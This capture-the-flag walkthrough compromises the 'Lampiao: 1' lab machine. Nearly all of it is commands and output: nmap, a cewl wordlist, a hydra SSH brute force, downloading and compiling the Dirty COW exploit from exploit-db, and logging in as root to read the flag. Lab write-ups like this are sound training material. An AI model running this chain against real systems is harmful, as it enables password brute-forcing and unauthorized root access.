Lampiao: 1

BACK __ _ / / __ _ _ __ ___ _ __ (_) __ _ ___ / / / _` | '_ ` _ \| '_ \| |/ _` |/ _ \ / /__| (_| | | | | | | |_) | | (_| | (_) | \____/\__,_|_| |_| |_| .__/|_|\__,_|\___/ |_| TARGET IP: 10.0.2.10 by sc00by ##### nmap: ##### $> nmap -sV -p- -vvv -n 10.0.2.10 Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-18 18:10 EDT NSE: Loaded 43 scripts for scanning. Initiating ARP Ping Scan at 18:10 Scanning 10.0.2.10 [1 port] Completed ARP Ping Scan at 18:10, 0.04s elapsed (1 total hosts) Initiating SYN Stealth Scan at 18:10 Scanning 10.0.2.10 [65535 ports] Discovered open port 80/tcp on 10.0.2.10 Discovered open port 22/tcp on 10.0.2.10 Discovered open port 1898/tcp on 10.0.2.10 Completed SYN Stealth Scan at 18:10, 3.80s elapsed (65535 total ports) Initiating Service scan at 18:10 Scanning 3 services on 10.0.2.10 Completed Service scan at 18:10, 13.98s elapsed (3 services on 1 host) NSE: Script scanning 10.0.2.10. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 18:10 Completed NSE at 18:10, 10.80s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 18:10 Completed NSE at 18:10, 0.01s elapsed Nmap scan report for 10.0.2.10 Host is up, received arp-response (0.000099s latency). Scanned at 2018-09-18 18:10:08 EDT for 29s Not shown: 65532 closed ports Reason: 65532 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http? syn-ack ttl 64 1898/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu)) ########################### wordlist of 10.0.2.10:1898: ########################### $> cewl 10.0.2.10:1898 > lampiao.dic $> ls lampiao.dic !!! User(s) found: tiago Eder ##################################### Hydra brute force on plaintext users: ##################################### $> hydra -t 4 -l tiago -P lampiao.dic 10.0.2.10 ssh Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-18 18:17:42 [DATA] max 4 tasks per 1 server, overall 4 tasks, 836 login tries (l:1/p:836), ~209 tries per task [DATA] attacking ssh://10.0.2.10:22/ [STATUS] 64.00 tries/min, 64 tries in 00:01h, 772 to do in 00:13h, 4 active [22][ssh] host: 10.0.2.10 login: tiago password: Virgulino 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-09-18 18:20:08 !!! Password found for 'tiago': Virgulino ################## SSH in as 'tiago': ################## $> ssh tiago@10.0.2.10 tiago@10.0.2.10's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Tue Sep 18 19:19:56 BRT 2018 System load: 0.0 Processes: 110 Usage of /: 7.5% of 19.07GB Users logged in: 0 Memory usage: 10% IP address for eth0: 10.0.2.10 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/ Last login: Tue Sep 18 18:58:25 2018 from 10.0.2.4 tiago@lampiao:~$ ############################################ Machine Enumeration / Vulnerabilty Scanning: ############################################ tiago@lampiao:~$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh --2018-09-18 19:33:00-- https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.48.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.48.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 65668 (64K) [text/plain] Saving to: ‘les.sh’ 100%[======================================================================================================================>] 65,668 --.-K/s in 0.09s 2018-09-18 19:33:00 (712 KB/s) - ‘les.sh’ saved [65668/65668] tiago@lampiao:~$ chmod u+x les.sh tiago@lampiao:~$ ./les.sh !!! INTERESTING FIND: dirtyc0w2: [+] [CVE-2016-5195] dirtycow 2 Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Download URL: https://www.exploit-db.com/download/40839 ext-url: https://www.exploit-db.com/download/40847.cpp Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh ########################################## Get dirtyc0w2 exploit onto target machine: ########################################## tiago@lampiao:~$ wget https://www.exploit-db.com/download/40847.cpp --2018-09-18 19:36:17-- https://www.exploit-db.com/download/40847.cpp Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8 Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/txt] Saving to: ‘40847.cpp’ [ <=> ] 10,531 --.-K/s in 0.04s 2018-09-18 19:36:17 (260 KB/s) - ‘40847.cpp’ saved [10531] tiago@lampiao:~$ ######################## Compile and run exploit: ######################## tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil tiago@lampiao:~$ ls 40847.cpp dcow les.sh tiago@lampiao:~$ ./dcow Running ... Received su prompt (Password: ) Root password is: dirtyCowFun Enjoy! :-) tiago@lampiao:~$ #################################### Take over root control and get flag: #################################### tiago@lampiao:~$ ssh root@10.0.2.10 The authenticity of host '10.0.2.10 (10.0.2.10)' can't be established. ECDSA key fingerprint is ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.0.2.10' (ECDSA) to the list of known hosts. root@10.0.2.10's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Tue Sep 18 19:30:29 BRT 2018 System load: 0.0 Processes: 106 Usage of /: 7.5% of 19.07GB Users logged in: 0 Memory usage: 10% IP address for eth0: 10.0.2.10 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/ Last login: Fri Apr 20 14:46:57 2018 from 192.168.108.1 root@lampiao:~# ls flag.txt root@lampiao:~# cat flag.txt 9740616875908d91ddcdaa8aea3af366 root@lampiao:~# whoami root root@lampiao:~# sc00by was here :) BACK